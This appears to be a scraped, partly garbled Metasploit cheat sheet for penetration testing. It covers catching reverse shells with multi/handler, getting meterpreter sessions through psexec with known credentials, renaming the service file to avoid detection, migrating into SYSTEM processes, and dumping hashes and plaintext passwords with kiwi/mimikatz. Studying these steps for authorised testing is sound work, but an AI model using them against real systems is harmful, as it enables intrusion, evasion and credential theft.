exploit/multi/handlerto catch reverse shells and manage several sessions. Make sure that you have the correct payload to catch.
exploit/windows/smb/psexecmodule with known credentials to create easy meterpreter sessions to pivot and exploit further. Can set the
SERVICE_FILENAMEoption to remove the random garbage used, because its suspicious (using something like
sessions -lcommand. Channels inside of sessions are managed with
channels -lcommand. Upgrade existing shells with the
sessions -u 1command.
CTRL-Zwill background a channel or session
use [module name]
SYSTEM, and we need to make sure the process we're in is the same architecture as the host.
sysinfo. Check the
Meterpreterinfo to make sure they match. If we need to move, check which running processes have the correct arch and are running as
ps -A x64 -s, then we can move with
migrate [PID]. Validate the arch and meterpreter types match with
load kiwi. Running
helpwill show our new mimikatz commands we can use. Using
creds_allwill dump all available hashes and plaintext passwords!